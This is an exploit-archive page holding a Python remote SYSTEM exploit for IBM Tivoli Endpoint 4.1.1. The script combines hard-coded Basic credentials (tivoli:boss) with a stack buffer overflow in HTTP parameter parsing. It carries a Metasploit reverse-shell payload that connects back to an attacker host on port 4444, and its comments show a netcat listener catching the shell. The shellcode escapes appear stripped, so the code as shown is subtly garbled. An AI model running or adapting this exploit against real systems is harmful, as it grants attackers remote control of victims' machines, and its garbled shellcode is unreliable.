Home / exploitsPDF  

IBM Tivoli Endpoint 4.1.1 Buffer Overflow / Hard-Coded Crede

Posted on 07 June 2011

#!/usr/bin/python
# tiv-sys.py
# IBM Tivoli Endpoint 4.1.1 Remote SYSTEM Exploit
# Jeremy Brown [0xjbrown41-gmail-com]
# June 2011
#
# Discovered by: Brian Adeloye of Tenable Network Security
#
# This exploit makes use of two vulnerabilities:
#
# 1) Base64 authentication credentials hard-coded in lcfd.exe
# 2) Stack-based buffer overflow when parsing HTTP variable values
#
# Tested on Tivoli Endpoint 4.1.1-LCF-0048 running on Windows XP SP3
#
# $ python tiv-sys.py 192.168.0.188
# .....
# $ nc -v -l 4444
# Connection from 192.168.0.188 port 4444 [tcp/*] accepted
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Program FilesTivolilcfdat1>
#
# References:
#
# http://www.zerodayinitiative.com/advisories/ZDI-11-169/
# https://www-304.ibm.com/support/docview.wss?uid=swg21499146
#

import sys
import struct
import socket
import httplib
import urllib

port=9495

ret=0x7C96BF33 # jmp esp @ user32.dll
junk="B"*256

# windows/shell_reverse_tcp - 333 bytes
# http://www.metasploit.com
# Encoder: x86/countdown
# LHOST=192.168.0.198, LPORT=4444, ReverseConnectRetries=5,
# EXITFUNC=thread, InitialAutoRunScript=, AutoRunScript=
payload=(
"x2bxc9x66xb9x39x01xe8xffxffxffxffxc1x5ex30"
"x4cx0ex07xe2xfaxfdxeax8ax04x05x06x67x81xec"
"x3bxd9x68x86x5cx3fx9bx43x1ex98x46x01x9dx65"
"x30x16xadx51x3ax2cxe1x2exe0x8dx1ex42x58x27"
"x0ax07xe9xe6x27x2axebxcfxdex7dx67xbax60x23"
"xbfx77x0ax36xe8xb2x7ax43xb9xfdx4ax75x41x91"
"x12xc8x0cx5dxcdx1fx68x48x99xa8x70x04xc5x7b"
"xdbx50x84x62xabx64x96xfbx99x96x57x5ax9bx65"
"xbex2ax94x62x1fx9bx5fx18x42x12x8ax31xe1x33"
"x48x6cxbdx09xfbx7dx39xf8x2cx69x77xa4xf3x7d"
"xf1x7axacxf4x3ax5bxa4xdaxd9xe2xddxdfxd7x78"
"x68xd1xd5xd1x07x9fx65x09xcdxf9xa1xa1x94x95"
"xfexe0xebxabxc5xcfxf4xd1xe9xb9xa7x5ex77x1b"
"x34xa4xa6xa7x81x6dxfexfbxc4x84x2exc4xb0x4e"
"x67xe3xe4xe5xe6xf7xe8xf9xeaxd3x56xb2x61x5f"
"x3fx14x4bx04xacx05x6exc7x0exa1xc8xcbxddx91"
"x47x29xbaxc1x84x84xbcx4cx73xa3xb9x26x0fxb3"
"xbfxb0xbaxdfx69x02xb5xb4xb3xd4x10x8dxfaxb0"
"xbcx09x11x8bx29xabxd4xcdxf3xf2x79xb1xd2xe7"
"x3exf9xbexafxacxabxa8xa9x46x57x4cx55x52x56"
"x50x6fx71xc5x35x8dxf3xd8x87xefx5ex47x54xec"
"x24x7dx1ex90x05x79xe5xcexa7xfdx03x35x2ax49"
"x84xb6x99xb8xd9xf2x14x2fx56x21xacxd6xcex5a"
"x35x8ax75x20x46x5ax5cx37x6bxc6xef")

if len(sys.argv)<2:
print "Usage: "+sys.argv[0]+" <target> [port]"
sys.exit(0)

target=sys.argv[1]
if len(sys.argv)==3:
port=int(sys.argv[2])

retaddr=struct.pack("<L",ret)

data=urllib.urlencode({"test":junk+retaddr+payload})
size=5+len(junk)+len(retaddr)+len(payload) # 'test=' = 5 (also works with just '=')
hdrs={"Host":"pw.n","Content-Length":size,"Authorization":"Basic dGl2b2xpOmJvc3M="} # tivoli:boss

conn=httplib.HTTPConnection(target,port)
conn.request("POST","/addr",data,hdrs)
conn.close()

 

TOP

Malware :

Exploits :